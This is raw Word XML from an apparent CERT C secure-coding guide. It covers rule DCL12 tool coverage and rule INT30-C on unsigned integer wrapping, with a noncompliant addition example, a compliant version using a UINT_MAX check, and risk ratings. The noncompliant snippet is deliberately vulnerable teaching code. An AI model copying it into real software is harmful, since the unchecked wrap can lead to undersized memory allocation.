            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C066B">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>CertC-DCL12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29A4DB2F" w14:textId="65E50C49" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C066B" w14:paraId="39933CAB" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32410B1A" w14:textId="0A0E61DB" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0453C4CF" w14:textId="1E1466C1" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C066B">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CB1DCF1" w14:textId="7102AAEF" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C066B">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>104 D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E75D5AD" w14:textId="42F08AB9" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C066B">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Partially implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C066B" w14:paraId="1BD6F81E" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="608B3879" w14:textId="1787D41D" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId15" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58025751" w14:textId="680D13C8" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C066B">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CDCA4B3" w14:textId="5E91C75D" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C066B">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>CERT_C-DCL12-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67A764E8" w14:textId="4860A0ED" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C066B">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>If a pointer to a structure or union is never dereferenced within a translation unit, then the implementation of the object should be hidden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C066B" w14:paraId="0D2FC839" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20F95697" w14:textId="3174AA0B" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId16" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="187BA178" w14:textId="62D69B5E" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C066B">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>R2021a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59EE3E6D" w14:textId="27FBECB1" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId17" w:history="1">
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>CERT C: Rec. DCL12-C</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23DDC087" w14:textId="41364179" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C066B">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Checks for structure or union object implementation visible in file where pointer to this object is not dereferenced (rule partially covered)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A343D5A" w:rsidR="00381847" w:rsidRDefault="00865183">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00865183">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ensure that unsigned integer operations do not wrap</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A990241" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00865183">
              <w:t>INT</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00865183">
              <w:t>030</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00865183">
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="164074C2" w14:textId="1297471F" w:rsidR="00381847" w:rsidRDefault="00865183">
            <w:r>
              <w:t>When reaching the limit size of storage for  a data value, the value will wrap around</w:t>
            </w:r>
            <w:r w:rsidR="006E33E1">
              <w:t xml:space="preserve"> to the other end of the limit. This should especially not be used in any pointer arithmetic.</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8219109" w:rsidR="00F72634" w:rsidRDefault="00B96EE8" w:rsidP="0015146B">
            <w:r>
              <w:t xml:space="preserve">The noncompliant code uses two integers which and wrapping occurs during </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ui_a</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ui_b</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F65974">
              <w:t>, the value may be used to allocate insufficient memory for another operation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="347ECF59" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="480C2BEE"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void </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">(unsigned int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unsigned int </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ui_b</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15FE1CA2"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unsigned int </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>usum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> =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 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ui_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="509D3E27"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 ... */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E0C2F48" w14:textId="3B664D10" w:rsidR="00F72634" w:rsidRDefault="006E33E1" w:rsidP="006E33E1">
            <w:r w:rsidRPr="006E33E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27457F1" w:rsidR="00F72634" w:rsidRDefault="00F65974" w:rsidP="0015146B">
            <w:r>
              <w:t>A precondition test is added, to test the operands of the addition and assure no unsigned wrapping has occurred.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="71761811" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="457AFA79"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void </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">(unsigned int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unsigned int </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ui_b</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19E7E0D5"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unsigned int </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>usum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6FA8FBEE"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if (UINT_MAX -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&lt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ui_b</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40D5CE46"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 Handle error */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65573429"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 else {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D78F5D7"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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>usum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> =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 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ui_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="047C16FF"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="278AD89B" w14:textId="77777777" w:rsidR="006E33E1" w:rsidRPr="006E33E1" w:rsidRDefault="006E33E1" w:rsidP="006E33E1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E33E1">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">  /* ... */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4DA9C0" w14:textId="14A46CFB" w:rsidR="00F72634" w:rsidRDefault="006E33E1" w:rsidP="006E33E1">
            <w:r w:rsidRPr="006E33E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C05804C" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C07BCD" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Validate</w:t>
            </w:r>
            <w:r w:rsidR="00C07BCD" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C07BCD" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Input Data</w:t>
            </w:r>
            <w:r w:rsidR="00C07BCD">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Integer wrapping often occurs when users input data, therefore this data should be validated to not exceed limits and cause occurrences of unsigned integer wrapping.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8C066B" w14:paraId="2205D897" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00278D98" w14:textId="3C6AD6D4" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="086FA0F7" w14:textId="1277FD97" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D7EE5AB" w14:textId="0DE45D60" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="483DB358" w14:textId="5C25BD22" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
